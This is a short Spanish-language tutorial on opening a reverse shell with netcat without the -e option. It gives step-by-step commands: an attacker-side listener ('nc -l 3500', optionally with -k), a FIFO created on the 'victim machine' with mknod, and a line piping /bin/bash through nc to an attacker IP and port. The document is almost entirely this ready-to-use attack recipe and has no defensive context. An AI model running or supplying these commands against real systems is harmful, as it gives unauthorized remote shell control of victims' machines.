Shell inversa

El programa Netcat puede incluir o no la opción -e, la cual permite crear una shell inversa fácilmente. Sin embargo, sin esta opción también existe un truco para hacerla y es el siguiente:

Para crear una shell inversa usando netcat sin la opción -e, se debe hacer lo siguiente:

1. Se debe levantar un servidor controlado por el atacante.

$ nc -l 3500

También se puede agregar la opción -k que permite que el servidor se mantenga a pesar que la conexión cliente se cierre.

$ nc -l -k 3500

2. Luego, en la máquina víctima se debe crear un archivo fifo:

$ mknod pipe p

3. Finalmente, ejecutamos la conexión con el atacante:

$ /bin/bash < pipe | nc [ip_atacante] [puerto_atacante] > pipe